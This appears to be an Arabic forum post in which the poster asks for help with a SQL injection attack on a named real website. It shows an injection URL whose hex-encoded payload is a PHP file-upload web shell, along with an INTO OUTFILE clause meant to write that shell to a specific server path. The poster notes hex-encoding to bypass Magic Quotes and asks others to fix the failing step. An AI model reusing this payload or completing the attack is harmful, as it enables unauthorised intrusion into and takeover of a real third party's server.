|
http://www.worldmusicinstitute.org/event.php?id=-906%20union%20select%201,2,3,4,5,6,7,8,0x3c666f726d206d6574686f643d706f737420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e707574206e616d653d6e20747970653d746578743e3c696e707574206e616d653d6620747970653d66696c653e3c2f666f726d3e3c3f70687020696628245f504f5354297b66696c655f7075745f636f6e74656e747328245f504f53545b6e5d2c66696c655f6765745f636f6e74656e747328245f46494c45535b665d5b746d705f6e616d655d29293b6469652831293b7d203f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75 هذا استغلال لثغرة SQL Injection وصلت لهذه المرحلة ثم لم اعرف كيف اتقدم محاولا رفع كود php في ملف داخل الموقع Magic Quotes = On حولت الكود php الى0xHEX الى حد الان كل شيء واضح لكن حين اضفت cod sql لرفع الملف اخرج لي خطء
+into+outfile+'/nfs/c01/h15/mnt/12738/domains/worldmusicinstitute.org/html/obits/dynpic.php'+--+انا اعرف انني ارتكبت خطء فهل يمكن لاحد ان يساعدني
 |
أسئلة وأجوبة 